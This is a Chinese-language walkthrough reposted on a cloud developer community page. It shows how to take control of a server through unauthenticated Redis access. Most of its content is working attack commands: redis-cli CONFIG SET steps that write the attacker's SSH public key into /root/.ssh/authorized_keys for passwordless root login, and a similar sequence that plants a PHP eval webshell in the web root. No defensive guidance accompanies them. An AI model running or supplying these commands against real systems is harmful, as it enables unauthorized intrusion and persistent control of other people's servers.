产品解决方案文档与社区免费试用定价云市场合作伙伴支持与服务了解阿里云
备案控制台登录/注册
开发者社区 数据库 文章 正文

Redis未授权访问导致服务器被控制

2017-11-12 1151
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介:
+关注继续查看

 通过使用nmap扫描,发现某一端口对应的服务为Redis,然后我们可以尝试看看是否是未授权访问!

    首先使用下列命令安装Redis tools:

1
root@kali:~# apt-get install redis-tools

     然后通过下列命令看是否是未授权访问:

1
2
root@kali:~# redis-cli -h 10.198.131.1
10.198.131.1:6379>

    然后我们可以使用免密登录的方式进行相关攻击:

    生成公钥:

1
2
3
4
root@lsy:~/.ssh# ssh-keygen -t rsa
root@lsy:~/.ssh# cat id_rsa.pub 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3lO+OSwj2zQuGON15ATfVwJAtLLbiswFoV/uqFHrw0BxaWSHTWgtrlzXyDen/ktDDBjfERlDys0vcZ3NQZ0/W+fWzbQkZbj/ABFsthhdQpdWWRz6wwOxY2tAKYhiZTcLchdFTnrU3+fkwD+im2W966A5UEZZmzTzTi/qA9BZwZghRrEx8Mr5+jVhQ8mYbR0QooggxTlafsavsBAG/aBTShoEanOuL4Pdx5aevmT3ydhwEJFwQQjBkARc8AUFY8cyS0/iPzT010uZYYHCPzhzm25QUSSbvIz9m7Mjwno72/OhKMCmVURkY4S1O4yXFzk+TlQ8P5jm+/pomKd++aPSn root@lsy
root@lsy:~/.ssh#

    将公钥写入远程服务器:

1
2
3
4
5
6
7
8
9
10
root@lsy:~/.ssh# redis-cli -h 10.198.131.1
10.198.131.1:6379> CONFIG SET dir /root/.ssh/
OK
10.198.131.1:6379> CONFIG SET dbfilename authorized_keys
OK
10.198.131.1:6379> set xxxx "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3lO+OSwj2zQuGON15ATfVwJAtLLbiswFoV/uqFHrw0BxaWSHTWgtrlzXyDen/ktDDBjfERlDys0vcZ3NQZ0/W+fWzbQkZbj/ABFsthhdQpdWWRz6wwOxY2tAKYhiZTcLchdFTnrU3+fkwD+im2W966A5UEZZmzTzTi/qA9BZwZghRrEx8Mr5+jVhQ8mYbR0QooggxTlafsavsBAG/aBTShoEanOuL4Pdx5aevmT3ydhwEJFwQQjBkARc8AUFY8cyS0/iPzT010uZYYHCPzhzm25QUSSbvIz9m7Mjwno72/OhKMCmVURkY4S1O4yXFzk+TlQ8P5jm+/pomKd++aPSn root@lsy\n\n\n"
OK
10.198.131.1:6379> save
OK
10.198.131.1:6379> exit

    使用ssh远程登录:

1
root@lsy:~/.ssh# ssh 10.198.131.1

    免密登录成功:

wKiom1mSV0KQs8wbAAFwicrDClk549.jpg-wh_50

上传webshell


1
2
3
4
5
#redis-cli -h 192.168.2.5 -p 6379
192.168.2.5:6379>config set dir  /var/wwww/html
192.168.2.5:6379>config set dbfilename 1.php
192.168.2.5:6379>set webshell "<php @eval(@_POST['passwd'])>"
192.168.2.5:6379>save


本文转自 eth10 51CTO博客,原文链接:http://blog.51cto.com/eth10/1956311



文章标签:
云数据库 Redis 版
NoSQL
Redis
机器学习/深度学习
关键词:
云数据库 Redis 版服务器
服务器redis
云数据库 Redis 版未授权
云数据库 Redis 版访问
服务器控制
相关实践学习
基于Redis实现在线游戏积分排行榜
本场景将介绍如何基于Redis数据库实现在线游戏中的游戏玩家积分排行榜功能。
云数据库 Redis 版使用教程
云数据库Redis版是兼容Redis协议标准的、提供持久化的内存数据库服务,基于高可靠双机热备架构及可无缝扩展的集群架构,满足高读写性能场景及容量需弹性变配的业务需求。 产品详情:https://www.aliyun.com/product/kvstore &nbsp; &nbsp; ------------------------------------------------------------------------- 阿里云数据库体验:数据库上云实战 开发者云会免费提供一台带自建MySQL的源数据库&nbsp;ECS 实例和一台目标数据库&nbsp;RDS实例。跟着指引,您可以一步步实现将ECS自建数据库迁移到目标数据库RDS。 点击下方链接,领取免费ECS&amp;RDS资源,30分钟完成数据库上云实战!https://developer.aliyun.com/adc/scenario/51eefbd1894e42f6bb9acacadd3f9121?spm=a2c6h.13788135.J_3257954370.9.4ba85f24utseFl
科技小能手
目录
相关文章
ZhangBlossom
|
2月前
|
NoSQL Java Linux
Centos7实现单服务器安装并开启多个Redis服务
Centos7实现单服务器安装并开启多个Redis服务
ZhangBlossom
27 0
丶重明
|
2月前
|
NoSQL Redis 数据库
【2023】Redis服务器与客户端操作
【2023】Redis服务器与客户端操作
丶重明
64 0
Kelvin3999
|
3月前
|
存储 NoSQL Unix
《微服务实战》 第二十章 Redis连接指令 客户端指令 服务器指令
《微服务实战》 第二十章 Redis连接指令 客户端指令 服务器指令
Kelvin3999
44 0
wayn111
|
3月前
|
自然语言处理 监控 NoSQL
生产环境Redis连接,长时间无响应被服务器断开问题
生产环境Redis连接,长时间无响应被服务器断开问题
wayn111
175 0
coder一枚
|
4月前
|
弹性计算 NoSQL Linux
阿里云持久内存服务器安装Redis by Alibaba Cloud Linux
阿里云持久内存型云服务器ECS有re7p、r7p、re6p等,云服务器吧以持久内存型re6p实例ecs.re6p-redis.2xlarge为例,操作系统镜像为Alibaba Cloud Linux 2.1903 LTS 64位,安装Redis 6.0.5或Redis 3.2.12教程如下:
coder一枚
81 0
Chengyunlai
|
5月前
|
NoSQL 安全 Java
Redis学习笔记:使用第三方框架连接Redis服务器前需要做哪些事?
通过Lettuce连接远程Redis服务器需要在客户端配置文件中配置Redis服务器的地址、端口、密码等信息。
Chengyunlai
67 0
Chengyunlai
|
5月前
|
存储 NoSQL Redis
Redis学习笔记:升级你的Redis服务器该怎么做(顺带也是安装)
只需下载最新版本的Redis,解压后进入目录,执行make和make install命令即可完成安装。升级Redis也同样简单,只需下载新版本的Redis,停止当前的Redis进程,替换为新版本。
Chengyunlai
79 0
洲的学习日记
|
8月前
|
NoSQL 开发工具 Redis
Redis学习13:服务器的基础配置
这个类似继承的意思。加速配置的一个东西。 服务器的配置比较独立一些,但配置并不是这么少,还有一些其他的。
洲的学习日记
57 0
Redis学习13:服务器的基础配置
清雨小竹
|
8月前
|
NoSQL Redis Windows
Windows下配置Redis服务器并允许公网访问
Windows下配置Redis服务器并允许公网访问
清雨小竹
260 0
1569428123893308
|
8月前
|
缓存 NoSQL API
分布式服务器框架之Servers.Common中使用CSRedis测试操作Redis中的string、hash_table、list、set、zset
在Servers.Common类库总创建了一个TestRedis.cs文件,我是在Servers.GameServer中去初始化的。主要是测试了Redis中常用的数据类型和常用的API,有一些不常用的可能没有写。需要详细了解API的话可以安装上CSRedis之后F12追进去查看,上面有详细的API说明。
1569428123893308
79 0
分布式服务器框架之Servers.Common中使用CSRedis测试操作Redis中的string、hash_table、list、set、zset
热门文章
最新文章
1
实战总结|一次访问Redis延时高问题排查与总结(续)
2
Redis实战学习笔记
3
Redis数据结构zset详解:范围查找
4
Redis 集群搭建原理
5
Redis有哪些潜在的慢操作?
6
Redis常用命令
7
图解Redis中的9种数据结构(高级面试,必备)
8
高并发场景下的redis缓存和数据库双写不一致问题分析与解决方案设计
9
基于Redis和MySQL的架构,如何保证数据一致性?
10
今天终于知道 Redis 为什么要用跳跃表了
1
98.【服务器及宝塔环境部署】
12
2
【网络编程】并发服务器的设计
11
3
公网使用SSH远程连接安卓手机Termux - Android手机服务器
16
4
串口服务器的选择中注意点
8
5
【Minecraft开服】--- Windows搭建我的世界MC服务器「公网远程联机」
30
6
安卓Termux搭建web服务器【公网远程手机Android服务器】
22
7
搭建Flink集群、集群HA高可用以及配置历史服务器
20
8
服务器意外断电MySQL无法启动
13
9
Java通过ssh向服务器上传下载删除文件和操作Linux
12
10
Web静态服务器
11
相关课程
更多
Redis数据库入门 云数据库 Redis 版使用教程 Linux Web服务器Nginx搭建与配置 Redis入门实战演练 大数据实战项目:反爬虫系统(Lua+Spark+Redis+Hadoop框架搭建)第一阶段 大数据实战项目 - 反爬虫系统(Lua+Spark+Redis+Hadoop框架搭建)第六阶段
相关电子书
更多
服务器的第一道防线-美联集团堡垒的前世今生 机器学习在大规模服务器治理复杂场景的实践 函数计算事件驱动的无服务器计算服务
相关实验场景
更多
通过会话管理端口转发功能访问ECS内部服务 如何通过数据库Redis内网访问 Tair for Redis数据闪回:任意时间点数据恢复 如何开通Redis的专属集群 基于Redis实现在线游戏积分排行榜
推荐文章
更多
重磅来袭!参与评测赢Iphone14 pro! 文件存储NAS评测征集令! 招募!寻找技术人的伯乐! 乘风者计划邀您入驻社区,精彩权益即刻享
下一篇
阿里云 X 森马 AIGC T恤设计大赛开启! 穿什么由你定,赢Airpods,作品定制联名T恤